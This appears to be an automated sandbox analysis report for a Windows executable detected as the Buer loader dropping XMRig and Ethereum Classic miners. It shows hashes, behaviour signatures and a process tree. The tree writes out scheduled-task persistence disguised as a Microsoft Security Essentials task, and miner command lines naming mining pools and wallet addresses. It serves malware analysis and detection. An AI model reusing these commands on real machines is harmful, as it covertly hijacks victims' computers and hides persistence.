Overview

overview

10

Static

static

d59962806f...da.exe

windows7_x64

10

d59962806f...da.exe

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    140s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    05-09-2021 16:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d59962806fcf8c3ed228654da0b964da.exe

  • Size

    17KB

  • MD5

    d59962806fcf8c3ed228654da0b964da

  • SHA1

    0373488126b5f13c8fd60ee37b81624568490db0

  • SHA256

    f29908da1b8065356704e746f9e282378a7e5ae65c753e2e9fe02b214b5b792b

  • SHA512

    f960494711f5230f86c9f76a2c43549eb64694a0f5a3dca5a3bee1ff55b78b854119bfd65d2676582edc36e80b84cdc0484f399c5eff98462e07caa8de164a88

Score
10/10
buerxmrigloaderminer

Malware Config

Signatures

  • Buer

    Buer is a new modular loader first seen in August 2019.

    loaderbuer
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 1 IoCs
    miner
  • Downloads MZ/PE file
  • Executes dropped EXE 13 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 64 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d59962806fcf8c3ed228654da0b964da.exe
    "C:\Users\Admin\AppData\Local\Temp\d59962806fcf8c3ed228654da0b964da.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:604
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1848
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:4088
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2668
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:952
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2736
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2164
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2184
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:4012
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3332
    • C:\ProgramData\1A60FBA9DF6219524D38\SystemManager.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\SystemManager.exe" -o pool.hashvault.pro:80 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQq8ANCL4mu9QqMXeRL --donate-level 1 -p x
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2252
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2192
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2736
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:3996
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2360
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2912
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3332
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2964
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3920
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:636
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:792
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:872
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2664
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:4012
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3368
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3084
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1184
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2672
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:3192
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3480
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3996
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3332
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1908
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:744
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3368
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2408
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:868
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3884
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3480
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2864
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3856
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:3892
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3632
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2212
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:512
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1184
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:404
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1344
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2736
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1828
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2680
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1340
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2724
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2772
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3976
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:4092
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1724
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3292
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2360
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1808
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1820
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2668
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:4012
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:988
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3352
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1512
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3004
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:3988
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2340
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1016
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1476
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:228
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1828
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3996
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2192
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2964
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
        PID:208
    • C:\ProgramData\1A60FBA9DF6219524D38\moduleName.exe
      C:\ProgramData\1A60FBA9DF6219524D38\moduleName.exe
      1⤵
      • Executes dropped EXE
      PID:3188
    • C:\ProgramData\1A60FBA9DF6219524D38\moduleName.exe
      C:\ProgramData\1A60FBA9DF6219524D38\moduleName.exe
      1⤵
      • Executes dropped EXE
      PID:872

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/604-114-0x0000000000EF0000-0x0000000000EF1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/604-118-0x0000000001460000-0x0000000001462000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2252-162-0x0000000001140000-0x0000000001160000-memory.dmp

      Filesize

      128KB

      Download

    • memory/2252-135-0x0000000000180000-0x00000000001A0000-memory.dmp

      Filesize

      128KB

      Download

    • memory/2252-143-0x00000000001C0000-0x00000000001E0000-memory.dmp

      Filesize

      128KB

      Download

    • memory/2252-161-0x00000000001E0000-0x0000000000200000-memory.dmp

      Filesize

      128KB

      Download